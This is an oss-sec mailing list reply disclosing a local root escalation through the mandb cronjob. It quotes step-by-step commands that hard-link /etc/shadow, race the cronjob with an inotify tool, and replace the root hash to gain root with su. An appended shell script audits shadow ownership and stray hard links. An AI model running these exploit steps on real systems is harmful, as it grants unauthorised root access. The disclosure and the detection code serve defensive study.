oss-sec mailing list archives

Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness


From: halfdog <me () halfdog net>
Date: Tue, 15 Dec 2015 19:25:30 +0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dag-Erling Smørgrav wrote:
> halfdog <me () halfdog net> writes:
> > Dag-Erling Smørgrav <des () des no> writes:
> > > And the PAM issue?
> > That's the most questionable.
>
> Hard to tell, since you didn't provide any information about it.
> You mentioned three issues, but linked to only two advisories,
> neither of which mentions PAM.

I was referring to this from [1], but perhaps I should have
highlighted it more prominently:


Using Timerace Using Inotify: As the mandb cronjob will change
ownership of any file to user man, there are numerous targets for
privilege escalation. The one I like best when the /bin/su SUID binary
is available is to change /etc/shadow. PAM just does not recognise this
state, so only the root password has to be cleared for su logon. For that
purpose, the good old inotify tool DirModifyInotify-20110530.c from a
previous article can be used. To escalate, the following steps are sufficient:

man# mkdir -p /var/cache/man/etc
man# ln /var/crash/.lock /var/cache/man/etc/shadow
man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
... Wait till daily cronjob was run
man# cp /etc/shadow .
man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x
man# cat x > /etc/shadow; rm x
man# su -s /bin/sh (password is 123)
root# cat shadow > /etc/shadow; chown root /etc/shadow

[1]
http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

-- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlZwaSQACgkQxFmThv7tq+60RACfbNp7aKX+dAn9NhCbqP1m/O0g
iAQAnAqjS/ujumwfQV7K4AYTQ326QoZj
=zuRK
-----END PGP SIGNATURE-----
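As an added example, not code from halfdog's advisory or from the DirModifyInotify tool: a small POSIX shell audit a defender can run against the scenario in this thread. It checks the two artifacts the steps above leave behind (a shadow file that is owned by a non-root user, has a stray hard link, or is group/world-writable, none of which PAM or su object to) and lists hard-linked regular files under a cache directory such as /var/cache/man, which is the foothold the race starts from. It assumes GNU coreutils stat and find (the -c format and the -links test); the demo tree and its contents are constructed under mktemp, so no real /etc/shadow is touched.

```shell
#!/bin/sh
# Added example (not halfdog's code). Assumes GNU stat/find on Linux.

# check_shadow_file FILE [EXPECTED_UID]
# Prints "ok" and returns 0 when FILE is owned by EXPECTED_UID (default 0,
# i.e. root), has exactly one hard link and is not group- or world-writable.
# Otherwise prints the first failing reason and returns 1.
check_shadow_file() {
    f=$1
    want_uid=${2:-0}
    if [ ! -f "$f" ]; then
        echo "missing"
        return 1
    fi
    uid=$(stat -c '%u' "$f")
    links=$(stat -c '%h' "$f")
    mode=$(stat -c '%a' "$f")
    if [ "$uid" != "$want_uid" ]; then
        # After the mandb race /etc/shadow is owned by "man", yet su works.
        echo "owner uid $uid, expected $want_uid"
        return 1
    fi
    if [ "$links" -gt 1 ]; then
        # A link count above 1 means another path (e.g. inside a man-owned
        # cache directory) names the same inode.
        echo "links $links"
        return 1
    fi
    # Last two octal digits are group and other; a write bit is 2, 3, 6 or 7.
    case $mode in
        *[2367]?) echo "group-writable mode $mode"; return 1 ;;
    esac
    case $mode in
        *[2367]) echo "world-writable mode $mode"; return 1 ;;
    esac
    echo "ok"
    return 0
}

# find_multilinked DIR
# Lists regular files under DIR whose hard-link count is above 1. Run
# against /var/cache/man this reveals a link planted for the cronjob to chown.
find_multilinked() {
    find "$1" -type f -links +1
}

# Demonstration on a constructed scratch tree: one clean file, then the same
# file after a hard link has been planted in a "cache" directory.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/cache"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$tmp/shadow"   # constructed
    chmod 640 "$tmp/shadow"
    check_shadow_file "$tmp/shadow" "$(id -u)" || :     # ok (owned by us)
    ln "$tmp/shadow" "$tmp/cache/shadow"
    check_shadow_file "$tmp/shadow" "$(id -u)" || :     # links 2
    find_multilinked "$tmp/cache"                        # .../cache/shadow
    rm -rf "$tmp"
}

demo
```

The owner check takes the expected uid as a parameter so the functions can be exercised as an unprivileged user; in production run it as root with the default of 0 against /etc/shadow and run find_multilinked over /var/cache/man from cron.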
